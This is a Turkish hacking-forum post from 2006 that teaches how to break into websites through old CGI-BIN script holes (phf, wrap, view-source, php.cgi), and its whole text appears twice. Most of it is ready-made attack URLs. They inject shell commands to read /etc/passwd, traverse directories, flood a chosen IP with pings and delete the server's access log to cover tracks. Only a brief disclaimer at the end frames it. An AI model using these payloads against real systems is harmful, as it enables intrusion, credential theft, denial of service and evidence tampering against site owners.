Esra_Nur
02-19-2006, 07:21 PM
:: SITELERI CGI/BIN AÇIKLARINDAN YARALANIP KIRMAK ::
a- (Phf scripti):
Pek çok web ana bilgisayarı CGI-BIN güvenliğinden
yoksundur. Birde bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı cgi-bin güvenlik açığı:
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd ([Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd)
Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yinede alternatif web makinaları üzerinde denemekte yarar var.
b- (Wrap Scripti):
Irix isletim sisteminin 6.2 versiyonunda rastlanan bu hatayıda şöyle istismar edebiliriz:
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/wrap?../../../etc/passwd
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/wrap?%0als (...)
Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View Source Scripti):
Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimalide var)
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/view-source?../../../etc/passwd
yada
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/view-source?%1b or
%0a %20
d- (php.cgi Scripti):
[Only Registered Users Can See Links]
e- Diğer Denenebilir Scriptler:
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/[Only Registered Users Can See Links]
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Not: Bilgi Amaçladır. Bilginizi Kötü Amaçlar İçin Lütfen Asla Kullanmayınız. İnsanların Alınteriyle Yaptıklarını Gasp Etmek Toplumda Suç ve En Önemlisi Allah Katında Günahtır...
a- (Phf scripti):
Pek çok web ana bilgisayarı CGI-BIN güvenliğinden
yoksundur. Birde bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı cgi-bin güvenlik açığı:
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd ([Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd)
Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yinede alternatif web makinaları üzerinde denemekte yarar var.
b- (Wrap Scripti):
Irix isletim sisteminin 6.2 versiyonunda rastlanan bu hatayıda şöyle istismar edebiliriz:
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/wrap?../../../etc/passwd
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/wrap?%0als (...)
Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View Source Scripti):
Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimalide var)
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/view-source?../../../etc/passwd
yada
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/view-source?%1b or
%0a %20
d- (php.cgi Scripti):
[Only Registered Users Can See Links]
e- Diğer Denenebilir Scriptler:
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/[Only Registered Users Can See Links]
[Only Registered Users Can See Links]ıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Not: Bilgi Amaçladır. Bilginizi Kötü Amaçlar İçin Lütfen Asla Kullanmayınız. İnsanların Alınteriyle Yaptıklarını Gasp Etmek Toplumda Suç ve En Önemlisi Allah Katında Günahtır...